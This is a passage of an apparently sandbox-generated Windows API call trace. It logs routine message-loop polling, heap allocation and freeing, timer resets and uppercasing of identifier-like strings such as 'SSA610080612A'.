wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.903] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0195.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0195.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0195.903] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.903] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.903] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.903] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0195.904] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0195.904] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0195.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0195.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0195.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0195.904] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0195.904] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.904] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0195.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0195.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0195.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0195.904] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.904] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.905] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0195.905] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0195.905] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0195.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0195.905] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0195.905] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 1 [0195.905] TranslateMessage (lpMsg=0x8bf3c0) returned 0 [0195.906] DispatchMessageW (lpMsg=0x8bf3c0) returned 0x0 [0195.906] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0195.906] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0195.906] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0195.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0195.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0195.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0195.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.906] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0195.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0195.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0195.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0195.907] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0195.907] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0195.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0195.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0195.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0195.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0195.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0195.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0195.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.908] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0195.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0195.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0195.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0195.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0195.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0195.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0195.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0195.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0195.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0195.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.908] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0195.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0195.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0195.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0195.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0195.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0195.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0195.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0195.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0195.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0195.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.909] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0195.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0195.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0195.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0195.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0195.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0195.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0195.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.910] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0195.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0195.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0195.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0195.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0195.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0195.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.911] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0195.911] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0195.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c48 [0195.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0195.911] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0195.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.912] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0195.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0195.912] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0195.913] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0195.913] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0195.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1e8 [0195.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0195.913] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0195.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0195.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0195.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0195.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.913] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0195.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0195.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0195.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0195.914] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0195.914] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0195.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0195.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0195.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0195.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 